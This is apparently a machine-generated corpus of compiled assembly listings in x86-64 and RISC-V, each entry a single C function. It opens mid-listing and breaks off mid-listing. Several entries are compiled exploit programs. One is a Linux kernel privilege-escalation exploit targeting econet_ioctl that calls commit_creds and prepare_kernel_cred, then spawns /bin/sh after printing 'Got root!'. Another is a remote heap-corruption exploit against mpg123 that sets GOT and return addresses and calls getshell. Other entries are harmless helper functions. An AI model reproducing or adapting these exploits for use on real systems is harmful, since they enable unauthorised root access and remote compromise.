.LC5(%rip), %rdi movq %rax, %rbp call get_kernel_sym@PLT leaq .LC6(%rip), %rdi movq %rax, commit_creds(%rip) call get_kernel_sym@PLT movq %rax, prepare_kernel_cred(%rip) testq %rbx, %rbx je .L4 cmpq $0, commit_creds(%rip) sete %dl testq %rax, %rax sete %al orb %al, %dl jne .L4 testq %rbp, %rbp je .L4 movl $65536, %edi call malloc@PLT movq %rax, %r13 testq %rax, %rax je .L18 leaq .LC9(%rip), %rdi call printf@PLT xorl %r9d, %r9d xorl %r8d, %r8d movl $8192, %esi movq SHIFT(%rip), %rcx subq OFFSET(%rip), %rbp movl PROT_READ(%rip), %edx orl PROT_WRITE(%rip), %edx leaq 80(%rbp), %r14 salq %cl, %rbx orl PROT_EXEC(%rip), %edx shrq %cl, %rbx movl MAP_PRIVATE(%rip), %ecx orl MAP_ANONYMOUS(%rip), %ecx movq %rbx, %rdi orl MAP_FIXED(%rip), %ecx andq $-4096, %rdi call mmap@PLT cmpq $-1, %rax je .L19 movl $1024, %edx leaq trampoline(%rip), %rsi movq %rbx, %rdi call memcpy@PLT subq $8, %rsp .cfi_def_cfa_offset 88 movq %r12, %rcx xorl %r9d, %r9d pushq %r14 .cfi_def_cfa_offset 96 xorl %r8d, %r8d movq trigger(%rip), %rdi leaq 65536(%r13), %rsi movl CLONE_VM(%rip), %edx orl CLONE_CHILD_CLEARTID(%rip), %edx orl SIGCHLD(%rip), %edx call clone@PLT movl $1, %edi call sleep@PLT leaq .LC11(%rip), %rdi call printf@PLT movl 24(%rsp), %edi xorl %edx, %edx xorl %esi, %esi call ioctl@PLT xorl %eax, %eax call getuid@PLT popq %rdx .cfi_def_cfa_offset 88 popq %rcx .cfi_def_cfa_offset 80 testq %rax, %rax jne .L20 leaq .LC13(%rip), %rdi call printf@PLT leaq .LC14(%rip), %rdi xorl %edx, %edx movq %rdi, %rsi call execl@PLT xorl %eax, %eax .L1: movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L21 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .L4: .cfi_restore_state leaq .LC7(%rip), %rdi call printf@PLT .L3: orl $-1, %eax jmp .L1 .L17: leaq .LC1(%rip), %rdi call printf@PLT jmp .L3 .L20: leaq .LC12(%rip), %rdi call printf@PLT jmp .L3 .L18: leaq .LC8(%rip), %rdi call printf@PLT jmp .L3 .L19: leaq .LC10(%rip), %rdi call printf@PLT jmp .L3 .L21: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl trigger .bss .align 8 .type trigger, @object .size trigger, 8 trigger: .zero 8 .globl trampoline .align 4 .type trampoline, @object .size trampoline, 4 trampoline: .zero 4 .globl prepare_kernel_cred .align 8 .type prepare_kernel_cred, @object .size prepare_kernel_cred, 8 prepare_kernel_cred: .zero 8 .globl commit_creds .align 8 .type commit_creds, @object .size commit_creds, 8 commit_creds: .zero 8 .globl SOCK_DGRAM .align 4 .type SOCK_DGRAM, @object .size SOCK_DGRAM, 4 SOCK_DGRAM: .zero 4 .globl SIGCHLD .align 4 .type SIGCHLD, @object .size SIGCHLD, 4 SIGCHLD: .zero 4 .globl SHIFT .align 8 .type SHIFT, @object .size SHIFT, 8 SHIFT: .zero 8 .globl PROT_WRITE .align 4 .type PROT_WRITE, @object .size PROT_WRITE, 4 PROT_WRITE: .zero 4 .globl PROT_READ .align 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .globl PROT_EXEC .align 4 .type PROT_EXEC, @object .size PROT_EXEC, 4 PROT_EXEC: .zero 4 .globl PF_ECONET .align 4 .type PF_ECONET, @object .size PF_ECONET, 4 PF_ECONET: .zero 4 .globl O_RDONLY .align 4 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .globl OFFSET .align 8 .type OFFSET, @object .size OFFSET, 8 OFFSET: .zero 8 .globl MAP_PRIVATE .align 4 .type MAP_PRIVATE, @object .size MAP_PRIVATE, 4 MAP_PRIVATE: .zero 4 .globl MAP_FIXED .align 4 .type MAP_FIXED, @object .size MAP_FIXED, 4 MAP_FIXED: .zero 4 .globl MAP_ANONYMOUS .align 4 .type MAP_ANONYMOUS, @object .size MAP_ANONYMOUS, 4 MAP_ANONYMOUS: .zero 4 .globl CLONE_VM .align 4 .type CLONE_VM, @object .size CLONE_VM, 4 CLONE_VM: .zero 4 .globl CLONE_CHILD_CLEARTID .align 4 .type CLONE_CHILD_CLEARTID, @object .size CLONE_CHILD_CLEARTID, 4 CLONE_CHILD_CLEARTID: .zero 4 .globl g_aug_volatile_1644 .data .align 4 .type g_aug_volatile_1644, @object .size g_aug_volatile_1644, 4 g_aug_volatile_1644: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_15704.c_main_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "/dev/zero" .align 3 .LC1: .string "[*] Failed to open file descriptors.\n" .align 3 .LC2: .string "[*] Resolving kernel addresses...\n" .align 3 .LC3: .string "econet_ioctl" .align 3 .LC4: .string "econet_ops" .align 3 .LC5: .string "commit_creds" .align 3 .LC6: .string "prepare_kernel_cred" .align 3 .LC7: .string "[*] Failed to resolve kernel symbols.\n" .align 3 .LC8: .string "[*] Failed to allocate memory.\n" .align 3 .LC9: .string "[*] Calculating target...\n" .align 3 .LC10: .string "[*] Failed to mmap() at target address.\n" .align 3 .LC11: .string "[*] Triggering payload...\n" .align 3 .LC12: .string "[*] Exploit failed to get root.\n" .align 3 .LC13: .string "[*] Got root!\n" .align 3 .LC14: .string "/bin/sh" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 sd s3,56(sp) la s3,__stack_chk_guard ld a5, 0(s3) sd a5, 24(sp) li a5, 0 lw a5,.LANCHOR0 sd s4,48(sp) addi s4,sp,8 addiw a5,a5,1 mv a0,s4 sw a5,.LANCHOR0,a4 sd ra,88(sp) sd s0,80(sp) sd s1,72(sp) lla s0,.LANCHOR1 sd s2,64(sp) sd s5,40(sp) call pipe@plt lw a1,0(s0) lw a0,4(s0) li a2,0 call socket@plt lw a1,8(s0) mv a5,a0 lla a0,.LC0 sw a5,16(sp) call open@plt lw a5,8(sp) lw a3,12(sp) lw a4,16(sp) sw a0,20(sp) or a5,a5,a3 or a5,a5,a4 or a5,a0,a5 sext.w a5,a5 blt a5,zero,.L22 lla a0,.LC2 call printf@plt lla a0,.LC3 call get_kernel_sym@plt mv s1,a0 lla a0,.LC4 call get_kernel_sym@plt mv s2,a0 lla a0,.LC5 call get_kernel_sym@plt mv a5,a0 lla a0,.LC6 sd a5,16(s0) call get_kernel_sym@plt sd a0,24(s0) beq s1,zero,.L4 ld a5,16(s0) beq a5,zero,.L4 beq a0,zero,.L4 beq s2,zero,.L4 li a0,65536 call malloc@plt mv s5,a0 beq a0,zero,.L23 lla a0,.LC9 call printf@plt lw a5,40(s0) lw a3,48(s0) lw a7,52(s0) lw a0,56(s0) lw a2,60(s0) lw a6,64(s0) ld a4,32(s0) lw a1,68(s0) sll s1,s1,a5 or a3,a3,a7 srl s1,s1,a5 or a2,a2,a6 or a3,a3,a0 li a0,-4096 sub s2,s2,a4 li a5,0 or a2,a2,a1 li a4,0 li a1,8192 and a0,s1,a0 call mmap@plt li a5,-1 addi s2,s2,80 beq a0,a5,.L24 li a2,1024 lla a1,.LANCHOR1+72 mv a0,s1 call memcpy@plt lw a5,80(s0) lw a2,76(s0) lw a1,84(s0) ld a0,88(s0) or a2,a2,a5 or a2,a2,a1 li a1,65536 mv a6,s2 li a5,0 li a4,0 mv a3,s4 add a1,s5,a1 call clone@plt li a0,1 call sleep@plt lla a0,.LC11 call printf@plt lw a0,16(sp) li a2,0 li a1,0 call ioctl@plt call getuid@plt bne a0,zero,.L25 lla a0,.LC13 call printf@plt lla a1,.LC14 li a2,0 mv a0,a1 call execl@plt li a0,0 .L9: ld a4, 24(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L26 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) addi sp,sp,96 jr ra .L4: lla a0,.LC7 call printf@plt li a0,-1 j .L9 .L22: lla a0,.LC1 call printf@plt li a0,-1 j .L9 .L25: lla a0,.LC12 call printf@plt li a0,-1 j .L9 .L23: lla a0,.LC8 call printf@plt li a0,-1 j .L9 .L24: lla a0,.LC10 call printf@plt li a0,-1 j .L9 .L26: call __stack_chk_fail@plt .size main, .-main .globl trigger .globl trampoline .globl prepare_kernel_cred .globl commit_creds .globl SOCK_DGRAM .globl SIGCHLD .globl SHIFT .globl PROT_WRITE .globl PROT_READ .globl PROT_EXEC .globl PF_ECONET .globl O_RDONLY .globl OFFSET .globl MAP_PRIVATE .globl MAP_FIXED .globl MAP_ANONYMOUS .globl CLONE_VM .globl CLONE_CHILD_CLEARTID .globl g_aug_volatile_1644 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_1644, @object .size g_aug_volatile_1644, 4 g_aug_volatile_1644: .word 8 .bss .align 3 .set .LANCHOR1,. + 0 .type SOCK_DGRAM, @object .size SOCK_DGRAM, 4 SOCK_DGRAM: .zero 4 .type PF_ECONET, @object .size PF_ECONET, 4 PF_ECONET: .zero 4 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .zero 4 .type commit_creds, @object .size commit_creds, 8 commit_creds: .zero 8 .type prepare_kernel_cred, @object .size prepare_kernel_cred, 8 prepare_kernel_cred: .zero 8 .type OFFSET, @object .size OFFSET, 8 OFFSET: .zero 8 .type SHIFT, @object .size SHIFT, 8 SHIFT: .zero 8 .type MAP_PRIVATE, @object .size MAP_PRIVATE, 4 MAP_PRIVATE: .zero 4 .type MAP_ANONYMOUS, @object .size MAP_ANONYMOUS, 4 MAP_ANONYMOUS: .zero 4 .type MAP_FIXED, @object .size MAP_FIXED, 4 MAP_FIXED: .zero 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .type PROT_WRITE, @object .size PROT_WRITE, 4 PROT_WRITE: .zero 4 .type PROT_EXEC, @object .size PROT_EXEC, 4 PROT_EXEC: .zero 4 .type trampoline, @object .size trampoline, 4 trampoline: .zero 4 .type CLONE_VM, @object .size CLONE_VM, 4 CLONE_VM: .zero 4 .type CLONE_CHILD_CLEARTID, @object .size CLONE_CHILD_CLEARTID, 4 CLONE_CHILD_CLEARTID: .zero 4 .type SIGCHLD, @object .size SIGCHLD, 4 SIGCHLD: .zero 4 .type trigger, @object .size trigger, 8 trigger: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_33808.c_dump_handle_aug_v3_4
.file "extr_33808.c_dump_handle_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] #=%d, %d, char nh[] = {" .LC1: .string "};\n" .LC2: .string "0x%02x" .LC3: .string "\n" .LC4: .string ", " .text .p2align 4 .globl dump_handle .type dump_handle, @function dump_handle: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 leaq .LC0(%rip), %rsi xorl %eax, %eax pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 movq %rdi, %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $8, %rsp .cfi_def_cfa_offset 64 movl 4(%rdi), %ecx movl (%rdi), %edx movl stderr(%rip), %edi call fprintf@PLT movl (%r14), %eax testl %eax, %eax jle .L10 movq 8(%r14), %rax movl stderr(%rip), %edi leaq .LC2(%rip), %rbp xorl %ebx, %ebx movq %rbp, %rsi leaq .LC4(%rip), %r13 leaq .LC3(%rip), %r12 movl (%rax), %edx xorl %eax, %eax call fprintf@PLT jmp .L7 .p2align 4,,10 .p2align 3 .L4: leal 1(%rbx), %edx movl stderr(%rip), %edi cmpl %edx, %eax jle .L6 .L5: leaq 1(%rbx), %r15 addl $2, %ebx movq 8(%r14), %rax movq %rbp, %rsi imull $-858993459, %ebx, %ebx movl (%rax,%r15,4), %edx xorl %eax, %eax call fprintf@PLT rorl $2, %ebx cmpl $214748364, %ebx ja .L3 movl stderr(%rip), %edi movq %r12, %rsi xorl %eax, %eax call fprintf@PLT .L3: movq %r15, %rbx .L7: movl (%r14), %eax leal -1(%rax), %edx cmpl %ebx, %edx jle .L4 movl stderr(%rip), %edi movq %r13, %rsi xorl %eax, %eax call fprintf@PLT movl (%r14), %eax leal 1(%rbx), %edx movl stderr(%rip), %edi cmpl %edx, %eax jg .L5 .L6: addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 leaq .LC1(%rip), %rsi xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 jmp fprintf@PLT .p2align 4,,10 .p2align 3 .L10: .cfi_restore_state movl stderr(%rip), %edi jmp .L6 .cfi_endproc .LFE0: .size dump_handle, .-dump_handle .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_33808.c_dump_handle_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] #=%d, %d, char nh[] = {" .align 3 .LC1: .string "};\n" .align 3 .LC2: .string "0x%02x" .align 3 .LC3: .string "\n" .align 3 .LC4: .string ", " .text .align 1 .globl dump_handle .type dump_handle, @function dump_handle: addi sp,sp,-80 sd s2,48(sp) lla s2,.LANCHOR0 lw a3,4(a0) lw a2,0(a0) sd s7,8(sp) mv s7,a0 lw a0,0(s2) lla a1,.LC0 sd ra,72(sp) sd s0,64(sp) sd s1,56(sp) sd s3,40(sp) sd s4,32(sp) sd s5,24(sp) sd s6,16(sp) call fprintf@plt lw a5,0(s7) ble a5,zero,.L6 ld a5,8(s7) lw a0,0(s2) lla a1,.LC2 lw a2,0(a5) li s1,4 li s0,1 call fprintf@plt lla s6,.LC4 lla s3,.LC2 li s4,20 lla s5,.LC3 .L7: lw a4,0(s7) addiw a5,s0,-1 addiw a3,a4,-1 bgt a3,a5,.L10 .L4: lw a0,0(s2) mv a1,s3 ble a4,s0,.L6 .L5: ld a5,8(s7) addiw s0,s0,1 add a5,a5,s1 lw a2,0(a5) addi s1,s1,4 call fprintf@plt remw a5,s0,s4 bne a5,zero,.L7 lw a0,0(s2) mv a1,s5 call fprintf@plt lw a4,0(s7) addiw a5,s0,-1 addiw a3,a4,-1 ble a3,a5,.L4 .L10: lw a0,0(s2) mv a1,s6 call fprintf@plt lw a4,0(s7) lw a0,0(s2) mv a1,s3 bgt a4,s0,.L5 .L6: ld s0,64(sp) lw a0,0(s2) ld ra,72(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) ld s4,32(sp) ld s5,24(sp) ld s6,16(sp) ld s7,8(sp) lla a1,.LC1 addi sp,sp,80 tail fprintf@plt .size dump_handle, .-dump_handle .globl stderr .bss .align 2 .set .LANCHOR0,. + 0 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_6
.file "extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] %s %s\n[+] %s\n\n" .text .p2align 4 .type r_cmd_java_print_cmd_help, @function r_cmd_java_print_cmd_help: .LFB25: .cfi_startproc endbr64 movl 4(%rdi), %edx movl 8(%rdi), %esi movl (%rdi), %ecx leaq .LC0(%rip), %rdi jmp eprintf@PLT .cfi_endproc .LFE25: .size r_cmd_java_print_cmd_help, .-r_cmd_java_print_cmd_help .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_core_java.c_r_cmd_java_print_cmd_help_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] %s %s\n[+] %s\n\n" .text .align 1 .type r_cmd_java_print_cmd_help, @function r_cmd_java_print_cmd_help: lw a3,0(a0) lw a2,4(a0) lw a1,8(a0) lla a0,.LC0 tail eprintf@plt .size r_cmd_java_print_cmd_help, .-r_cmd_java_print_cmd_help .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_23171.c_main_aug_v3_1
.file "extr_23171.c_main_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "none" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n" .section .rodata.str1.1 .LC2: .string "%x" .section .rodata.str1.8 .align 8 .LC3: .string "[!] %u is not a valid target, ignored.\n" .section .rodata.str1.1 .LC4: .string "p:s:g:r:+:t:l" .section .rodata.str1.8 .align 8 .LC5: .string "[*] platform value base\t\t: %s.\n" .align 8 .LC6: .string "[*] fprintf GOT address\t\t: 0x%.8x.\n" .align 8 .LC7: .string "[*] *request address location\t: 0x%.8x.\n" .align 8 .LC8: .string "[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n" .section .rodata.str1.1 .LC9: .string "[!] exploit failed." .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 leaq .LC0(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 leaq .LC2(%rip), %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 leaq .LC4(%rip), %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movl %edi, %r12d leaq .LC1(%rip), %rdi pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movq %rsi, %rbp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 leaq .L6(%rip), %rbx subq $24, %rsp .cfi_def_cfa_offset 80 movl g_aug_volatile_7944(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_7944(%rip) call puts@PLT .p2align 4,,10 .p2align 3 .L2: movq %r13, %rdx movq %rbp, %rsi movl %r12d, %edi call getopt@PLT cmpl %eax, EOF(%rip) je .L26 cmpl $43, %eax je .L3 subl $103, %eax cmpl $13, %eax ja .L4 movslq (%rbx,%rax,4), %rax addq %rbx, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L6: .long .L11-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L10-.L6 .long .L4-.L6 .long .L4-.L6 .long .L4-.L6 .long .L9-.L6 .long .L4-.L6 .long .L8-.L6 .long .L7-.L6 .long .L5-.L6 .section .text.startup .p2align 4,,10 .p2align 3 .L4: movq 0(%rbp), %rdi call usage@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L5: movq target(%rip), %rsi xorl %eax, %eax movl optarg(%rip), %edi cmpq $0, (%rsi) je .L27 .p2align 4,,10 .p2align 3 .L12: leal 1(%rax), %edx leaq (%rdx,%rdx,2), %rcx movq %rdx, %rax cmpq $0, (%rsi,%rcx,8) jne .L12 movq %rdx, 8(%rsp) call atoi@PLT movq 8(%rsp), %rdx cmpq %rax, %rdx jbe .L18 movl optarg(%rip), %edi movq target(%rip), %r15 call atoi@PLT movq target(%rip), %rdx movl optarg(%rip), %edi imulq $24, %rax, %rax movq %rdx, 8(%rsp) movq (%r15,%rax), %r15 call atoi@PLT movq 8(%rsp), %rdx movl optarg(%rip), %edi imulq $24, %rax, %rax movl 8(%rdx,%rax), %eax movq target(%rip), %rdx movl %eax, gotaddr(%rip) movq %rdx, 8(%rsp) call atoi@PLT movq 8(%rsp), %rdx movl optarg(%rip), %edi imulq $24, %rax, %rax movl 12(%rdx,%rax), %eax movq target(%rip), %rdx movl %eax, requestaddr(%rip) movq %rdx, 8(%rsp) call atoi@PLT movq 8(%rsp), %rdx imulq $24, %rax, %rax movl 16(%rdx,%rax), %eax sall $2, %eax movl %eax, retoffset(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L7: movl optarg(%rip), %edi call atoi@PLT movl %eax, sport(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L8: movl optarg(%rip), %edi leaq requestaddr(%rip), %rdx movq %r14, %rsi call sscanf@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L9: movl optarg(%rip), %edi call atoi@PLT movq %rax, port(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L10: xorl %eax, %eax call platform_list@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L11: movl optarg(%rip), %edi leaq gotaddr(%rip), %rdx movq %r14, %rsi call sscanf@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L3: movl optarg(%rip), %edi call atoi@PLT sall $2, %eax movl %eax, retoffset(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L26: cmpq $0, port(%rip) je .L28 .L17: movq %r15, %rsi leaq .LC5(%rip), %rdi xorl %eax, %eax call printf@PLT movl gotaddr(%rip), %esi leaq .LC6(%rip), %rdi xorl %eax, %eax call printf@PLT movl requestaddr(%rip), %esi leaq .LC7(%rip), %rdi xorl %eax, %eax call printf@PLT movl retoffset(%rip), %edx movl requestaddr(%rip), %ecx leaq .LC8(%rip), %rdi addl %edx, %ecx leal 3(%rdx), %esi testl %edx, %edx cmovns %edx, %esi xorl %eax, %eax sarl $2, %esi call printf@PLT movl sport(%rip), %eax movq x86_exec(%rip), %rdx movzbl %ah, %ecx andl $255, %eax movl %eax, 136(%rdx) xorl %eax, %eax movl %ecx, 132(%rdx) call audioserver_bind@PLT movq %rax, %rdi call getshell@PLT leaq .LC9(%rip), %rdi call puts@PLT xorl %edi, %edi call exit@PLT addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L27: .cfi_restore_state call atoi@PLT .L18: movl optarg(%rip), %edi call atoi@PLT leaq .LC3(%rip), %rdi movq %rax, %rsi xorl %eax, %eax call printf@PLT jmp .L2 .L28: movq 0(%rbp), %rdi call usage@PLT jmp .L17 .cfi_endproc .LFE0: .size main, .-main .globl x86_exec .bss .align 8 .type x86_exec, @object .size x86_exec, 8 x86_exec: .zero 8 .globl target .align 8 .type target, @object .size target, 8 target: .zero 8 .globl sport .align 4 .type sport, @object .size sport, 4 sport: .zero 4 .globl retoffset .align 4 .type retoffset, @object .size retoffset, 4 retoffset: .zero 4 .globl requestaddr .align 4 .type requestaddr, @object .size requestaddr, 4 requestaddr: .zero 4 .globl port .align 8 .type port, @object .size port, 8 port: .zero 8 .globl optarg .align 4 .type optarg, @object .size optarg, 4 optarg: .zero 4 .globl gotaddr .align 4 .type gotaddr, @object .size gotaddr, 4 gotaddr: .zero 4 .globl EOF .align 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .globl g_aug_volatile_7944 .data .align 4 .type g_aug_volatile_7944, @object .size g_aug_volatile_7944, 4 g_aug_volatile_7944: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_23171.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "none" .align 3 .LC1: .string "[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n" .align 3 .LC2: .string "%x" .align 3 .LC3: .string "[!] %u is not a valid target, ignored.\n" .align 3 .LC4: .string "p:s:g:r:+:t:l" .align 3 .LC5: .string "[*] platform value base\t\t: %s.\n" .align 3 .LC6: .string "[*] fprintf GOT address\t\t: 0x%.8x.\n" .align 3 .LC7: .string "[*] *request address location\t: 0x%.8x.\n" .align 3 .LC8: .string "[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n" .align 3 .LC9: .string "[!] exploit failed." .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-128 lw a5,.LANCHOR0 sd s3,88(sp) addiw a5,a5,1 mv s3,a0 lla a0,.LC1 sd s0,112(sp) sd s1,104(sp) sd s2,96(sp) sd s4,80(sp) sd s5,72(sp) sd s6,64(sp) sd s7,56(sp) sd s8,48(sp) sd s9,40(sp) sd s10,32(sp) sd ra,120(sp) sd s11,24(sp) mv s2,a1 sw a5,.LANCHOR0,a4 lla s8,.LC0 call puts@plt lla s0,.LANCHOR1 lla s4,.LC4 li s6,43 li s5,13 lla s1,.L6 lla s10,.LANCHOR1+32 lla s7,.LC2 lla s9,.LANCHOR1+28 .L2: mv a2,s4 mv a1,s2 mv a0,s3 call getopt@plt lw a5,40(s0) beq a5,a0,.L26 .L16: beq a0,s6,.L3 addiw a0,a0,-103 sext.w a5,a0 bgtu a5,s5,.L4 slli a5,a0,32 srli a0,a5,30 add a0,a0,s1 lw a5,0(a0) add a5,a5,s1 jr a5 .section .rodata .align 2 .align 2 .L6: .word .L11-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L10-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L9-.L6 .word .L4-.L6 .word .L8-.L6 .word .L7-.L6 .word .L5-.L6 .section .text.startup .L4: ld a0,0(s2) call usage@plt mv a2,s4 mv a1,s2 mv a0,s3 call getopt@plt lw a5,40(s0) bne a5,a0,.L16 .L26: ld a5,16(s0) beq a5,zero,.L27 .L17: mv a1,s8 lla a0,.LC5 call printf@plt lw a1,28(s0) lla a0,.LC6 call printf@plt lw a1,32(s0) lla a0,.LC7 call printf@plt lw a2,36(s0) lw a3,32(s0) lla a0,.LC8 sraiw a1,a2,31 srliw a1,a1,30 addw a1,a1,a2 addw a3,a3,a2 sraiw a1,a1,2 call printf@plt lw a5,24(s0) ld a3,48(s0) sraiw a4,a5,8 andi a4,a4,255 andi a5,a5,255 sw a4,132(a3) sw a5,136(a3) call audioserver_bind@plt call getshell@plt lla a0,.LC9 call puts@plt li a0,0 call exit@plt ld ra,120(sp) ld s0,112(sp) ld s1,104(sp) ld s2,96(sp) ld s3,88(sp) ld s4,80(sp) ld s5,72(sp) ld s6,64(sp) ld s7,56(sp) ld s8,48(sp) ld s9,40(sp) ld s10,32(sp) ld s11,24(sp) li a0,0 addi sp,sp,128 jr ra .L5: ld a3,0(s0) lw a0,8(s0) li a4,0 ld a5,0(a3) beq a5,zero,.L28 .L12: addiw a4,a4,1 slli s11,a4,32 srli s11,s11,32 slli a5,s11,1 add a5,a5,s11 slli a5,a5,3 add a5,a3,a5 ld a5,0(a5) bne a5,zero,.L12 call atoi@plt bleu s11,a0,.L18 lw a0,8(s0) li s11,24 ld s8,0(s0) call atoi@plt mul a4,a0,s11 ld a5,0(s0) lw a0,8(s0) sd a5,0(sp) add s8,s8,a4 ld s8,0(s8) call atoi@plt mul a3,a0,s11 ld a5,0(sp) ld a4,0(s0) lw a0,8(s0) sd a4,8(sp) add a5,a5,a3 lw a5,8(a5) sw a5,28(s0) call atoi@plt mul a3,a0,s11 ld a4,8(sp) ld a5,0(s0) lw a0,8(s0) sd a5,0(sp) add a4,a4,a3 lw a4,12(a4) sw a4,32(s0) call atoi@plt mul a0,a0,s11 ld a5,0(sp) add a5,a5,a0 lw a5,16(a5) slliw a5,a5,2 sw a5,36(s0) j .L2 .L7: lw a0,8(s0) call atoi@plt sw a0,24(s0) j .L2 .L8: lw a0,8(s0) mv a2,s10 mv a1,s7 call sscanf@plt j .L2 .L9: lw a0,8(s0) call atoi@plt sd a0,16(s0) j .L2 .L10: call platform_list@plt j .L2 .L11: lw a0,8(s0) mv a2,s9 